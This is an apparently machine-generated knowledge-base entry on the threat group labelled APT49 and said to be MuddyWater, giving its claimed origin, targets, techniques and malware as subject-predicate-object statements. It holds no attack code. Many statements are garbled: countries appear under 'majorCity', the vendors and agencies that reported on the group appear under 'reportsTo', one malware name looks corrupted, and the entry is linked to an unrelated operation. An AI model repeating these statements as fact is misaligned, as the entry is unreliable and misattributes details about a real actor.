APT49

GPTKB entity

Statements (48)
Predicate Object
gptkbp:instanceOf cyber threat group
gptkbp:activeYearsStart 2017
gptkbp:alsoKnownAs gptkb:MuddyWater
gptkbp:associatedWith gptkb:Iranian_Ministry_of_Intelligence_and_Security
gptkbp:attributedTo publicly attributed by UK NCSC
publicly attributed by US Cyber Command
gptkbp:countryOfOrigin gptkb:Iran
https://www.w3.org/2000/01/rdf-schema#label APT49
gptkbp:industry gptkb:energy
gptkb:government
defense
telecommunications
academia
gptkbp:infrastructure cloud services
compromised servers
legitimate web services
gptkbp:majorCity gptkb:India
gptkb:Israel
gptkb:Pakistan
gptkb:Saudi_Arabia
gptkb:Turkey
gptkb:United_States
gptkbp:motive gptkb:intelligence_gathering
espionage
regional influence
gptkbp:notableEvent attacks on Middle Eastern government entities
attacks on energy sector organizations
attacks on telecommunications providers
gptkbp:reportsTo gptkb:Microsoft
gptkb:Palo_Alto_Networks
gptkb:FireEye
gptkb:US_Cybersecurity_and_Infrastructure_Security_Agency_(CISA)
UK National Cyber Security Centre (NCSC)
gptkbp:technique PowerShell scripts
credential harvesting
living off the land
spear phishing
remote access trojans
gptkbp:usesMalware gptkb:BlackWater
gptkb:MuddyC3
gptkb:MuddyWater_RAT
gptkb:SharpStage
gptkb:Mimikatz
gptkb:POWERSTATS
MuddyC2Go
Seashell Bladder
gptkbp:bfsParent gptkb:Operation_Winnti
gptkbp:bfsLayer 7